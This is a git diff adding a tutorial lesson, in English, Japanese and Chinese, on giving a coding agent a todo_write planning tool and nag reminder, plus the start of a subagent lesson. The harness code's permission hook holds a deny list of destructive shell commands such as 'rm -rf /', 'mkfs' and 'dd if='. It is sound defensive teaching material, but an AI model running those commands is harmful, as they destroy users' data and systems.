s02 → s03 → s04 → `s05` → [s06](../s06_subagent/) → s07 → ... → s19 + +> *"An agent without a plan goes wherever the wind blows"* — List the steps first, then execute. Completion rate doubles. +> +> **Harness Layer**: Planning — Let the Agent think before it acts. + +--- + +## The Problem + +Give the Agent a complex task: "Rename all Python files to snake_case, run tests, and fix failures." + +The Agent starts working — renames 3 files, runs a test, finds 2 failures, starts fixing. While fixing, it forgets the original goal was "rename to snake_case" — the test failures have consumed all its attention. + +The longer the conversation, the worse it gets: tool results keep filling the context, diluting the system prompt's influence. A 10-step refactoring: after steps 1-3, the Agent starts improvising because steps 4-10 have been pushed out of its attention. + +--- + +## The Solution + +![Todo Overview](images/todo-overview.en.svg) + +The s04 loop and hooks are fully preserved. The only change is registering one more tool in TOOL_HANDLERS: `todo_write`. It does no actual work — can't read files, can't run commands — it simply lets the Agent organize its thoughts before diving in. + +The loop doesn't change. The new tool is automatically dispatched through `TOOL_HANDLERS[block.name]`. + +--- + +## How It Works + +**The todo_write tool** — accepts a list with statuses, persists to disk, and displays progress in the terminal: + +```python +def run_todo_write(todos: list) -> str: + tasks_file = TASKS_DIR / "current_todos.json" + tasks_file.write_text(json.dumps(todos, indent=2, ensure_ascii=False)) + + lines = ["\n## Current Tasks"] + for t in todos: + icon = {"pending": " ", "in_progress": "▸", "completed": "✓"}[t["status"]] + lines.append(f" [{icon}] {t['content']}") + print("\n".join(lines)) + return f"Updated {len(todos)} tasks" +``` + +The tool definition joins the other 5 in the dispatch map: + +```python +TOOLS = [ + {"name": "bash", ...}, + {"name": "read_file", ...}, + {"name": "write_file", ...}, + {"name": "edit_file", ...}, + {"name": "glob", ...}, + # s05: new entry + {"name": "todo_write", "description": "Create and manage a task list ...", + "input_schema": { + "type": "object", + "properties": { + "todos": { + "type": "array", + "items": { + "type": "object", + "properties": { + "content": {"type": "string"}, + "status": {"type": "string", "enum": ["pending", "in_progress", "completed"]}, + }, + }, + }, + }, + }, + }, +] + +TOOL_HANDLERS["todo_write"] = run_todo_write +``` + +**Nag reminder** — when the model hasn't called `todo_write` for 3 consecutive rounds, a reminder is automatically injected: + +```python +if rounds_since_todo >= 3 and messages: + last = messages[-1] + if last["role"] == "user" and isinstance(last.get("content"), list): + last["content"].insert(0, { + "type": "text", + "text": "Update your todos.", + }) +``` + +Typical flow when the Agent receives a task: first call `todo_write` to list all steps (all `pending`) → pick one step, set it to `in_progress` → complete it, set to `completed` → look at the next `pending` → continue. Haven't updated in 3 rounds? The nag reminder chases it down. + +**Key insight**: todo_write doesn't give the Agent any additional **execution capability**. What it adds is **planning capability**. + +--- + +## Changes from s04 + +| Component | Before (s04) | After (s05) | +|-----------|-------------|-------------| +| Tool count | 5 (bash, read, write, edit, glob) | 6 (+todo_write) | +| Planning | None | Stateful TODO list + nag reminder | +| SYSTEM prompt | Generic prompt | Added "plan before executing" guidance | +| Loop | Unchanged | Unchanged (new tool auto-dispatched) | + +--- + +## Try It + +```sh +cd learn-claude-code +python s05_todo_write/code.py +``` + +Try these prompts: + +1. `Refactor the file hello.py: add type hints, docstrings, and a main guard` (should list 3 steps first, then execute) +2. `Create a Python package with __init__.py, utils.py, and tests/test_utils.py` +3. `Review all Python files and fix any style issues` + +What to watch for: Did the Agent call `todo_write` first? How many steps did it list? Did it go back to update TODO status during execution? Did the nag reminder appear after 3 rounds without updates? + +--- + +## What's Next + +The Agent can plan now. But if a task is too large — say "refactor the entire auth module" — a TODO list alone isn't enough. That task is itself a collection of dozens of subtasks that would drown in a single conversation's context. + +→ s06 Subagent: Break large tasks into subtasks, each handled by an independent Agent with its own clean context — no cross-contamination. + +
+Dive into CC Source Code + +CC has two task systems coexisting (`tasks.ts:133`): + +- **TodoWrite (V1)**: Default in interactive sessions. A simple list tool, data lives in memory. +- **Task System (V2 = s12)**: Default in non-interactive sessions (SDK). File-persisted, dependency graph, concurrency locks, ownership. + +The switch is controlled by `isTodoV2Enabled()`: enabled when the `CLAUDE_CODE_ENABLE_TASKS` environment variable is set or in non-interactive sessions. + +They're not replacements — they **coexist**. In interactive scenarios, the Agent uses TodoWrite for quick checklists; in SDK/multi-Agent scenarios, it uses the Task System for structured task management. The teaching version covers TodoWrite first (simpler concept) then the Task System (s12), following the progressive principle from simple to complex. + +Core increments of the Task System over TodoWrite: +- File persistence (`.tasks/{id}.json`) instead of in-memory list +- `blockedBy` dependency graph instead of flat list +- `proper-lockfile` concurrency safety instead of no locking +- Four separate tools (Create/Get/Update/List) instead of one +- Lifecycle hooks (TaskCreated/TaskCompleted) for external system integration + +
+ + diff --git a/s05_todo_write/README.ja.md b/s05_todo_write/README.ja.md new file mode 100644 index 000000000..a47242c3a --- /dev/null +++ b/s05_todo_write/README.ja.md @@ -0,0 +1,155 @@ +# s05: TodoWrite — 計画なき Agent は途中で道を外れる + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → `s05` → [s06](../s06_subagent/) → s07 → ... → s19 + +> *"計画なき agent は風の向くままに"* — まず手順を列挙してから実行。完了率が倍増する。 +> +> **Harness レイヤー**: 計画 — Agent が行動する前に考えさせる。 + +--- + +## 課題 + +Agent に複雑なタスクを与える:「全 Python ファイルを snake_case にリネームし、テストを実行し、失敗を修正して。」 + +Agent は作業を開始する — 3 つのファイルをリネーム、テストを実行、2 つの失敗を発見、修正を開始。修正しているうちに、本来の目的が「snake_case にリネーム」だったことを忘れる — テストの失敗に注意を全て持っていかれる。 + +会話が長くなるほど悪化する:ツールの結果がコンテキストを埋め続け、システムプロンプトの影響力が希釈される。10 ステップのリファクタリング:ステップ 1-3 を終えた時点で Agent は即興で動き始める。ステップ 4-10 は既に注意の外に追い出されているから。 + +--- + +## ソリューション + +![Todo Overview](images/todo-overview.ja.svg) + +s04 のループとフックは完全に保持される。唯一の変更は TOOL_HANDLERS にもう一つツールを登録すること:`todo_write`。これは実際の作業を何もしない — ファイルを読めない、コマンドを実行できない — Agent が手を動かす前に思考を整理できるようにするだけ。 + +ループは変わらない。新しいツールは `TOOL_HANDLERS[block.name]` を通じて自動的にディスパッチされる。 + +--- + +## 仕組み + +**todo_write ツール** — ステータス付きのリストを受け取り、ディスクに永続化し、端末に進捗を表示する: + +```python +def run_todo_write(todos: list) -> str: + tasks_file = TASKS_DIR / "current_todos.json" + tasks_file.write_text(json.dumps(todos, indent=2, ensure_ascii=False)) + + lines = ["\n## Current Tasks"] + for t in todos: + icon = {"pending": " ", "in_progress": "▸", "completed": "✓"}[t["status"]] + lines.append(f" [{icon}] {t['content']}") + print("\n".join(lines)) + return f"Updated {len(todos)} tasks" +``` + +ツール定義は他の 5 つと一緒にディスパッチマップに追加される: + +```python +TOOLS = [ + {"name": "bash", ...}, + {"name": "read_file", ...}, + {"name": "write_file", ...}, + {"name": "edit_file", ...}, + {"name": "glob", ...}, + # s05: 新規追加 + {"name": "todo_write", "description": "Create and manage a task list ...", + "input_schema": { + "type": "object", + "properties": { + "todos": { + "type": "array", + "items": { + "type": "object", + "properties": { + "content": {"type": "string"}, + "status": {"type": "string", "enum": ["pending", "in_progress", "completed"]}, + }, + }, + }, + }, + }, + }, +] + +TOOL_HANDLERS["todo_write"] = run_todo_write +``` + +**Nag リマインダー** — モデルが連続 3 ラウンド `todo_write` を呼び出さないとき、リマインダーが自動的に注入される: + +```python +if rounds_since_todo >= 3 and messages: + last = messages[-1] + if last["role"] == "user" and isinstance(last.get("content"), list): + last["content"].insert(0, { + "type": "text", + "text": "Update your todos.", + }) +``` + +Agent がタスクを受け取った後の典型的な流れ:まず `todo_write` を呼び出して全手順を列挙(全て `pending`)→ 一つの手順に取り掛かり、`in_progress` に変更 → 完了したら `completed` に変更 → 次の `pending` を見る → 続行。3 ラウンド更新なし? Nag リマインダーが追いかけてくる。 + +**重要な洞察**:todo_write は Agent に**実行能力**を何も追加しない。追加するのは**計画能力**だ。 + +--- + +## s04 からの変更 + +| コンポーネント | 変更前 (s04) | 変更後 (s05) | +|--------------|-------------|-------------| +| ツール数 | 5 (bash, read, write, edit, glob) | 6 (+todo_write) | +| 計画能力 | なし | ステータス付き TODO リスト + Nag リマインダー | +| SYSTEM プロンプト | 汎用プロンプト | 「先に計画してから実行」のガイダンスを追加 | +| ループ | 不変 | 不変(新ツールは自動ディスパッチ) | + +--- + +## 試してみよう + +```sh +cd learn-claude-code +python s05_todo_write/code.py +``` + +以下のプロンプトを試してみよう: + +1. `Refactor the file hello.py: add type hints, docstrings, and a main guard`(まず 3 手順を列挙してから実行するはず) +2. `Create a Python package with __init__.py, utils.py, and tests/test_utils.py` +3. `Review all Python files and fix any style issues` + +観察のポイント:Agent はまず `todo_write` を呼び出したか? 何手順列挙したか? 実行中に TODO のステータスを更新し戻ったか? 3 ラウンド更新なしで Nag リマインダーが表示されたか? + +--- + +## 次へ + +Agent は計画できるようになった。しかしタスクが大きすぎる場合 — 例えば「認証モジュール全体をリファクタリング」— TODO リストだけでは不十分。そのタスク自体が数十のサブタスクの集合体で、同じ会話のコンテキストに押し込めると溢れてしまう。 + +→ s06 Subagent:大きなタスクをサブタスクに分割し、それぞれを独立した Agent に任せる。それぞれが独自のクリーンなコンテキストを持ち、相互汚染がない。 + +
+CC ソースコードを深掘り + +CC には二つのタスクシステムが共存している(`tasks.ts:133`): + +- **TodoWrite(V1)**:対話型セッションでデフォルト使用。シンプルなリストツール、データはメモリ内 +- **Task System(V2 = s12)**:非対話型セッション(SDK)でデフォルト使用。ファイル永続化、依存グラフ、並行ロック、ownership + +切り替えは `isTodoV2Enabled()` で制御:`CLAUDE_CODE_ENABLE_TASKS` 環境変数が設定されているか、非対話型セッションの場合に V2 が有効になる。 + +両者は置き換え関係ではなく **共存関係**。対話型シナリオでは Agent が TodoWrite で素早くチェックリストを作成し、SDK/マルチエージェントシナリオでは Task System で構造化されたタスク管理を行う。教育版はまず TodoWrite を(概念がシンプル)次に Task System(s12)を取り上げる、簡単から複雑への段階的原則に従う。 + +Task System の TodoWrite に対する核心的な増分: +- メモリリストではなくファイル永続化(`.tasks/{id}.json`) +- 平坦なリストではなく `blockedBy` 依存グラフ +- ロックなしではなく `proper-lockfile` による並行安全性 +- 一つのツールではなく四つの独立ツール(Create/Get/Update/List) +- 外部システム統合のためのライフサイクルフック(TaskCreated/TaskCompleted) + +
+ + diff --git a/s05_todo_write/README.md b/s05_todo_write/README.md new file mode 100644 index 000000000..170fb02f8 --- /dev/null +++ b/s05_todo_write/README.md @@ -0,0 +1,155 @@ +# s05: TodoWrite — 没有计划的 Agent,做着做着就偏了 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → `s05` → [s06](../s06_subagent/) → s07 → ... → s19 + +> *"没有计划的 agent 走哪算哪"* — 先列步骤再动手, 完成率翻倍。 +> +> **Harness 层**: 规划 — 让 Agent 在动手之前先想清楚。 + +--- + +## 问题 + +给 Agent 一个复杂任务:"把所有 Python 文件改成 snake_case 命名,然后跑测试,修好失败。" + +Agent 开始干活——改了 3 个文件,跑了个测试,发现 2 个失败,开始修。修着修着,它忘了最初是"改成 snake_case"——测试失败把注意力全吸走了。 + +对话越长越严重:工具结果不断填满上下文,系统提示的影响力被稀释。一个 10 步重构,做完 1-3 步就开始即兴发挥,因为 4-10 步已经被挤出注意力了。 + +--- + +## 解决方案 + +![Todo Overview](images/todo-overview.svg) + +s04 的循环和钩子完全保留。唯一的变化是在 TOOL_HANDLERS 里多注册一个工具:`todo_write`。它本身不做任何实际工作——不能读文件、不能跑命令——只是让 Agent 在动手之前先理清思路。 + +循环一行不改。新工具自动通过 `TOOL_HANDLERS[block.name]` 分发。 + +--- + +## 工作原理 + +**todo_write 工具**——接收一个带状态的列表,持久化到磁盘,同时在终端显示进度: + +```python +def run_todo_write(todos: list) -> str: + tasks_file = TASKS_DIR / "current_todos.json" + tasks_file.write_text(json.dumps(todos, indent=2, ensure_ascii=False)) + + lines = ["\n## Current Tasks"] + for t in todos: + icon = {"pending": " ", "in_progress": "▸", "completed": "✓"}[t["status"]] + lines.append(f" [{icon}] {t['content']}") + print("\n".join(lines)) + return f"Updated {len(todos)} tasks" +``` + +工具定义和其他 5 个工具一起加入 dispatch map: + +```python +TOOLS = [ + {"name": "bash", ...}, + {"name": "read_file", ...}, + {"name": "write_file", ...}, + {"name": "edit_file", ...}, + {"name": "glob", ...}, + # s05: 新增一条 + {"name": "todo_write", "description": "Create and manage a task list ...", + "input_schema": { + "type": "object", + "properties": { + "todos": { + "type": "array", + "items": { + "type": "object", + "properties": { + "content": {"type": "string"}, + "status": {"type": "string", "enum": ["pending", "in_progress", "completed"]}, + }, + }, + }, + }, + }, + }, +] + +TOOL_HANDLERS["todo_write"] = run_todo_write +``` + +**Nag reminder**——模型连续 3 轮没调 `todo_write` 时,自动注入一条提醒: + +```python +if rounds_since_todo >= 3 and messages: + last = messages[-1] + if last["role"] == "user" and isinstance(last.get("content"), list): + last["content"].insert(0, { + "type": "text", + "text": "Update your todos.", + }) +``` + +Agent 收到任务后的典型流程:先调 `todo_write` 列出所有步骤(全 `pending`)→ 做一个步骤,改成 `in_progress` → 做完改成 `completed` → 看下一个 `pending` → 继续。3 轮不更新?nag reminder 追着它问。 + +**关键洞察**:todo_write 不给 Agent 增加任何**执行能力**。它增加的是**规划能力**。 + +--- + +## 相对 s04 的变更 + +| 组件 | 之前 (s04) | 之后 (s05) | +|------|-----------|-----------| +| 工具数量 | 5 (bash, read, write, edit, glob) | 6 (+todo_write) | +| 规划能力 | 无 | 带状态的 TODO 列表 + nag reminder | +| SYSTEM 提示 | 通用提示 | 加入 "先计划再执行" 引导 | +| 循环 | 不变 | 不变(新工具自动分发) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s05_todo_write/code.py +``` + +试试这些 prompt: + +1. `Refactor the file hello.py: add type hints, docstrings, and a main guard`(先列 3 步再执行) +2. `Create a Python package with __init__.py, utils.py, and tests/test_utils.py` +3. `Review all Python files and fix any style issues` + +观察重点:Agent 先调了 `todo_write` 吗?它列了几个步骤?执行过程中有没有回头更新 TODO 状态?连续 3 轮不更新时是否出现了 nag reminder? + +--- + +## 接下来 + +Agent 能计划了。但如果一个任务太大——比如"重构整个认证模块"——光靠 TODO 列表不够。这个任务本身就是几十个小任务的集合,放在同一个对话里会被上下文淹没。 + +s06 Subagent → 把大任务拆成子任务,每个子任务派一个独立的 Agent。它们有自己的干净上下文,不会互相污染。 + +
+深入 CC 源码 + +CC 中有两套任务系统并存(`tasks.ts:133`): + +- **TodoWrite(V1)**:交互式会话中默认使用。一个简单的列表工具,数据在内存中 +- **Task System(V2 = s12)**:非交互式会话(SDK)中默认使用。文件持久化、依赖图、并发锁、ownership + +切换由 `isTodoV2Enabled()` 控制:设置了 `CLAUDE_CODE_ENABLE_TASKS` 环境变量或非交互式会话时启用 V2。 + +两者不是取代关系——是**并存关系**。交互式场景下 Agent 用 TodoWrite 快速列清单,SDK/多 Agent 场景下用 Task System 做结构化任务管理。教学版先讲 TodoWrite(概念简单)再讲 Task System(s12),符合从简单到复杂的渐进原则。 + +Task System 相比 TodoWrite 的核心增量: +- 文件持久化(`.tasks/{id}.json`)而非内存列表 +- `blockedBy` 依赖图而非平铺列表 +- `proper-lockfile` 并发安全而非无锁 +- 四个独立工具(Create/Get/Update/List)而非一个 +- 生命周期 hooks(TaskCreated/TaskCompleted)供外部系统集成 + +
+ + diff --git a/s05_todo_write/code.py b/s05_todo_write/code.py new file mode 100644 index 000000000..620d0fa66 --- /dev/null +++ b/s05_todo_write/code.py @@ -0,0 +1,281 @@ +#!/usr/bin/env python3 +""" +s05: TodoWrite — add a planning tool on top of s04 hooks. + + +---------+ +-------+ +------------------+ + | User | ---> | LLM | ---> | TOOL_HANDLERS | + | prompt | | | | bash | + +---------+ +---+---+ | read_file | + ^ | write_file | + | result | edit_file | + +---------+ glob | + todo_write ← NEW + +------------------+ + | + .tasks/current_todos.json + | + if rounds_since_todo >= 3: + inject + +Changes from s04: + + todo_write tool + run_todo_write() implementation + + Nag reminder (inject reminder after 3 rounds without todo update) + + SYSTEM prompt includes "plan before execute" guidance + + rounds_since_todo counter in agent_loop + Loop unchanged: new tool auto-dispatches via TOOL_HANDLERS. + +Run: python s05_todo_write/code.py +Needs: pip install anthropic python-dotenv + ANTHROPIC_API_KEY in .env +""" + +import os, subprocess, json +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +TASKS_DIR = WORKDIR / ".tasks"; TASKS_DIR.mkdir(exist_ok=True) +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# s05 change: SYSTEM prompt adds planning guidance +SYSTEM = ( + f"You are a coding agent at {WORKDIR}. " + "Before starting any multi-step task, use todo_write to plan your steps. " + "Update status as you go." +) + + +# ═══════════════════════════════════════════════════════════ +# FROM s02-s04 (unchanged): Tool Implementations +# ═══════════════════════════════════════════════════════════ + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path) + file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + +def run_edit(path: str, old_text: str, new_text: str) -> str: + try: + file_path = safe_path(path) + text = file_path.read_text() + if old_text not in text: + return f"Error: text not found in {path}" + file_path.write_text(text.replace(old_text, new_text, 1)) + return f"Edited {path}" + except Exception as e: + return f"Error: {e}" + +def run_glob(pattern: str) -> str: + import glob as g + try: + results = g.glob(pattern, root_dir=WORKDIR) + return "\n".join(results) if results else "(no matches)" + except Exception as e: + return f"Error: {e}" + + +# ═══════════════════════════════════════════════════════════ +# NEW in s05: todo_write tool — plan only, no execution +# ═══════════════════════════════════════════════════════════ + +def run_todo_write(todos: list) -> str: + tasks_file = TASKS_DIR / "current_todos.json" + tasks_file.write_text(json.dumps(todos, indent=2, ensure_ascii=False)) + lines = ["\n\033[33m## Current Tasks\033[0m"] + for t in todos: + icon = {"pending": " ", "in_progress": "\033[36m▸\033[0m", "completed": "\033[32m✓\033[0m"}[t["status"]] + lines.append(f" [{icon}] {t['content']}") + print("\n".join(lines)) + return f"Updated {len(todos)} tasks" + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "limit": {"type": "integer"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in a file once.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, + {"name": "glob", "description": "Find files matching a glob pattern.", + "input_schema": {"type": "object", "properties": {"pattern": {"type": "string"}}, "required": ["pattern"]}}, + # s05: new tool + {"name": "todo_write", "description": "Create and manage a task list for your current coding session.", + "input_schema": {"type": "object", "properties": {"todos": {"type": "array", "items": {"type": "object", "properties": {"content": {"type": "string"}, "status": {"type": "string", "enum": ["pending", "in_progress", "completed"]}}}}}}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "edit_file": run_edit, "glob": run_glob, "todo_write": run_todo_write, +} + + +# ═══════════════════════════════════════════════════════════ +# FROM s04 (unchanged): Hook System +# ═══════════════════════════════════════════════════════════ + +HOOKS = {"UserPromptSubmit": [], "PreToolUse": [], "PostToolUse": [], "Stop": []} + +def register_hook(event: str, callback): + HOOKS[event].append(callback) + +def trigger_hooks(event: str, *args): + for callback in HOOKS[event]: + result = callback(*args) + if result is not None: + return result + return None + +# s04 hooks preserved +DENY_LIST = ["rm -rf /", "sudo", "shutdown", "reboot", "mkfs", "dd if="] + +def permission_hook(block): + """PreToolUse: deny list check.""" + if block.name == "bash": + for p in DENY_LIST: + if p in block.input.get("command", ""): + print(f"\n\033[31m⛔ Blocked: '{p}'\033[0m") + return "Permission denied" + return None + +def log_hook(block): + """PreToolUse: log tool calls.""" + print(f"\033[90m[HOOK] {block.name}\033[0m") + return None + +def context_inject_hook(query: str): + """UserPromptSubmit: log working directory.""" + print(f"\033[90m[HOOK] UserPromptSubmit: working in {WORKDIR}\033[0m") + return None + +def summary_hook(messages: list): + """Stop: print tool call count.""" + tool_count = sum(1 for m in messages + for b in (m.get("content") if isinstance(m.get("content"), list) else []) + if isinstance(b, dict) and b.get("type") == "tool_result") + print(f"\033[90m[HOOK] Stop: session used {tool_count} tool calls\033[0m") + return None + +register_hook("UserPromptSubmit", context_inject_hook) +register_hook("PreToolUse", permission_hook) +register_hook("PreToolUse", log_hook) +register_hook("Stop", summary_hook) + + +# ═══════════════════════════════════════════════════════════ +# agent_loop — same as s04 + nag reminder counter +# ═══════════════════════════════════════════════════════════ + +rounds_since_todo = 0 + +def agent_loop(messages: list): + global rounds_since_todo + while True: + # s05: nag reminder — inject if model hasn't updated todos for 3 rounds + if rounds_since_todo >= 3 and messages: + last = messages[-1] + if last["role"] == "user" and isinstance(last.get("content"), list): + last["content"].insert(0, { + "type": "text", + "text": "Update your todos.", + }) + + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason != "tool_use": + force = trigger_hooks("Stop", messages) + if force: + messages.append({"role": "user", "content": force}) + continue + return + + rounds_since_todo += 1 + results = [] + for block in response.content: + if block.type != "tool_use": + continue + + blocked = trigger_hooks("PreToolUse", block) + if blocked: + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": str(blocked)}) + continue + + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + + trigger_hooks("PostToolUse", block, output) + + # s05: reset nag counter when todo_write is called + if block.name == "todo_write": + rounds_since_todo = 0 + + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": output}) + + messages.append({"role": "user", "content": results}) + + +if __name__ == "__main__": + print("s05: TodoWrite — plan before execute, nag if you forget") + print("Type a question, press Enter. Type q to quit.\n") + + history = [] + while True: + try: + query = input("\033[36ms05 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + trigger_hooks("UserPromptSubmit", query) + history.append({"role": "user", "content": query}) + agent_loop(history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s05_todo_write/images/todo-overview.en.svg b/s05_todo_write/images/todo-overview.en.svg new file mode 100644 index 000000000..15bed37ab --- /dev/null +++ b/s05_todo_write/images/todo-overview.en.svg @@ -0,0 +1,94 @@ + + + + + + + + + + + + + + + + + + + + + + + + TodoWrite — Loop Unchanged, One More Tool Auto-Dispatched + + + s04 Preserved + + + + messages[] + + + + + + + LLM + stop_reason? + + + + No + + Return Result + + + + Yes + + + + trigger_hooks + PreToolUse + + + + + + s05 New + + + + TOOL_HANDLERS + + + + bash · read · write + + + edit · glob + + + + todo_write + + → .tasks/current_todos.json + + + + Results appended to messages[], loop continues + + + + Nag Reminder + Model hasn't called todo_write for 3 rounds → auto-inject <reminder>Update your todos.</reminder> + + + + + s04 Preserved (loop, hooks, 5 base tools) + + s05 New (todo_write + nag reminder) + diff --git a/s05_todo_write/images/todo-overview.ja.svg b/s05_todo_write/images/todo-overview.ja.svg new file mode 100644 index 000000000..596bcf447 --- /dev/null +++ b/s05_todo_write/images/todo-overview.ja.svg @@ -0,0 +1,94 @@ + + + + + + + + + + + + + + + + + + + + + + + + TodoWrite — ループ不変、ツール一つ追加で自動ディスパッチ + + + s04 保持 + + + + messages[] + + + + + + + LLM + stop_reason? + + + + No + + 結果を返す + + + + Yes + + + + trigger_hooks + PreToolUse + + + + + + s05 新規 + + + + TOOL_HANDLERS + + + + bash · read · write + + + edit · glob + + + + todo_write + + → .tasks/current_todos.json + + + + 結果を messages[] に追加、ループ継続 + + + + Nag リマインダー(催促機構) + モデルが連続 3 ラウンド todo_write 未呼び出し → 自動注入 <reminder>Update your todos.</reminder> + + + + + s04 保持(ループ、フック、5 つの基本ツール) + + s05 新規(todo_write + Nag リマインダー) + diff --git a/s05_todo_write/images/todo-overview.svg b/s05_todo_write/images/todo-overview.svg new file mode 100644 index 000000000..81a28c434 --- /dev/null +++ b/s05_todo_write/images/todo-overview.svg @@ -0,0 +1,94 @@ + + + + + + + + + + + + + + + + + + + + + + + + TodoWrite — 循环不变,多一个工具自动分发 + + + s04 保留 + + + + messages[] + + + + + + + LLM + stop_reason? + + + + + + 返回结果 + + + + + + + + trigger_hooks + PreToolUse + + + + + + s05 新增 + + + + TOOL_HANDLERS + + + + bash · read · write + + + edit · glob + + + + todo_write + + → .tasks/current_todos.json + + + + 结果追加到 messages[],循环继续 + + + + Nag Reminder(催更机制) + 模型连续 3 轮没调 todo_write → 自动注入 <reminder>Update your todos.</reminder> + + + + + s04 保留(循环、钩子、5 个基础工具) + + s05 新增(todo_write + nag reminder) + diff --git a/s06_subagent/README.en.md b/s06_subagent/README.en.md new file mode 100644 index 000000000..bea7eaa26 --- /dev/null +++ b/s06_subagent/README.en.md @@ -0,0 +1,188 @@ +# s06: Subagent — Break Large Tasks into Small Ones with Clean Context + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → s05 → `s06` → [s07](../s07_skill_loading/) → s08 → ... → s19 + +> *"Break large tasks small, each with clean context"* — Subagent uses an independent messages[], no pollution in the main conversation. +> +> **Harness Layer**: Sub-Agent — Context isolation, attention doesn't drift. + +--- + +## The Problem + +The Agent is fixing a bug. It reads 30 files to trace the call chain, chatting for 60 rounds along the way. The messages list grows to 120 entries, most of which are intermediate steps from "tracing the call chain" — unrelated to the final goal of "fixing the bug." + +These intermediate steps occupy context space, making the Agent increasingly "forgetful" — it can no longer remember what the original problem was. + +Think of it differently: when you fix a bug, you'd "open a new terminal" to trace the call chain. When done, close the terminal, write the result into your notes, and return to the original terminal to keep fixing. The Agent needs this ability too — **open an independent sub-process, give it an independent message list, let it focus on one thing.** + +--- + +## The Solution + +![Subagent Overview](images/subagent-overview.en.svg) + +The s05 loop, hooks, and TODO system are fully preserved. The only change is registering one more tool in TOOL_HANDLERS: `task`. When called, it spawns a sub-Agent — with a fresh `messages[]`, running its own loop, and returning only a summary text to the main Agent. All intermediate steps are discarded. + +The sub-Agent's tools are restricted: it has bash/read/write/edit/glob, but **no task** — recursive spawning of grandchild Agents is forbidden. + +--- + +## How It Works + +**spawn_subagent** — gives the sub-Agent a fresh messages list, runs its own loop, returns only the conclusion: + +```python +def spawn_subagent(description: str) -> str: + # Sub-Agent tools: base tools, but no task (no recursion) + sub_tools = [ + {"name": "bash", ...}, {"name": "read_file", ...}, + {"name": "write_file", ...}, {"name": "edit_file", ...}, + {"name": "glob", ...}, + ] + messages = [{"role": "user", "content": description}] # fresh messages[] + + for _ in range(30): # safety limit + response = client.messages.create( + model=MODEL, system=SYSTEM, + messages=messages, tools=sub_tools, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if block.type == "tool_use": + handler = SUB_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": output}) + messages.append({"role": "user", "content": results}) + + # Return only the final text conclusion — all intermediate steps discarded + return extract_text(messages[-1]["content"]) +``` + +The main Agent calls it just like any other tool: + +```python +TOOLS = [ + {"name": "bash", ...}, + {"name": "read_file", ...}, + {"name": "write_file", ...}, + {"name": "edit_file", ...}, + {"name": "glob", ...}, + {"name": "todo_write", ...}, + # s06: new task tool + {"name": "task", + "description": "Launch a subagent to handle a complex subtask. Returns only the final conclusion.", + "input_schema": {"type": "object", "properties": {"description": {"type": "string"}}, "required": ["description"]}}, +] + +TOOL_HANDLERS["task"] = spawn_subagent +``` + +Three key design decisions: + +| Decision | Choice | Reason | +|----------|--------|--------| +| Context isolation | Fresh `messages[]` | Sub-Agent's intermediate steps don't pollute main Agent's context | +| Return only conclusion | `extract_text(last_message)` | Not returning the entire messages list | +| No recursion | Sub-Agent has no task tool | Prevents sub-Agent from spawning grandchild Agents | + +The loop doesn't change. The task tool is automatically dispatched through `TOOL_HANDLERS[block.name]`. + +--- + +## Changes from s05 + +| Component | Before (s05) | After (s06) | +|-----------|-------------|-------------| +| Tool count | 6 (bash, read, write, edit, glob, todo_write) | 7 (+task) | +| New function | — | spawn_subagent (independent messages[] + 30-round safety limit) | +| Context isolation | Everything in the main conversation | Sub-Agent uses fresh messages[] | +| Loop | Unchanged | Unchanged (task tool auto-dispatched) | + +--- + +## Try It + +```sh 